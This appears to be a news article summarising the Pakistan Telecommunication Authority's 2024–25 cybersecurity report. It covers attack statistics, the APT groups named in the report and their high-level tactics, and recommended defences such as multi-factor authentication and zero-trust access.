Pakistan’s telecom and government systems have come under an intensified wave of AI-powered cyberattacks, according to PTA’s Cyber Security Annual Report 2024–25. The report outlines how identity-driven, stealth-based intrusions are exploiting legitimate tools and privileges to infiltrate networks with unprecedented precision. It warns that the rise of AI-assisted deception marks a turning point in Pakistan’s cybersecurity landscape, where traditional antivirus and perimeter defenses are proving increasingly ineffective.
Data from the National Telecom Security Operations Center (nTSOC) paints a stark picture of escalating digital hostilities. Over the past year, nTSOC processed more than 10,000 critical alerts, escalated around 1,500 incidents, and blocked over 500 malicious infrastructure elements. During April and May 2025 alone, 25 Distributed Denial of Service (DDoS) attacks and over 100 dark web threats were recorded, underscoring how attackers are leveraging AI tools for precision targeting, credential theft, and lateral movement across telecom and government systems. The report details a shift toward “living-off-the-land” techniques, where adversaries manipulate built-in system processes rather than deploying traditional malware. These methods—often involving script interpreter abuse, obfuscation, and social engineering—allow cybercriminals to operate below the radar, bypassing signature-based defenses.
nTSOC’s operational insights reveal a vast and diversified threat environment. More than 150 advisories were issued through the National CERT portal, while 534 malicious IPs and domains were blocked. Hundreds of leaked credentials belonging to telecom and public-sector employees were discovered circulating on dark web marketplaces, illustrating the scale of data compromise. The most frequently targeted sectors included government agencies, telecom operators, academic institutions, and law enforcement systems. Attackers employed an array of tactics ranging from phishing and credential stuffing to ransomware and website defacements, many resulting in compromised systems and stolen access credentials later traded in underground forums.
PTA attributes many of these incursions to a handful of persistent and state-sponsored Advanced Persistent Threat (APT) groups. Among the most active were Sidewinder, employing localized decoy documents and beaconing commands; APT36, weaponizing Android spyware and malicious PDFs; APT41, exploiting software supply chain flaws; and Turla, using steganography and watering-hole attacks. Hacktivist collectives such as R00TK1T were also identified for targeting judicial and municipal websites through coordinated defacement campaigns. PTA emphasizes that phishing, exploitation of unpatched systems, and misuse of remote access continue to serve as the main gateways for such breaches.
To fortify national cyber resilience, PTA recommends adopting multi-factor authentication across all digital infrastructure, implementing zero-trust access models, and enabling automated intelligence sharing across sectors. It also calls for cross-sector cyber drills and legal mandates requiring breach disclosures within 48 to 72 hours. While the telecom industry’s security posture is showing signs of maturity—with 88% of licensees rated as “Excellent” or “Very Good”—the report highlights persistent gaps in application security, encryption, and network visibility. PTA concludes that sustained investment, stronger inter-agency collaboration, and the adoption of CTDISR-2025 cybersecurity controls are vital to securing Pakistan’s digital future against increasingly adaptive AI-driven threats.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
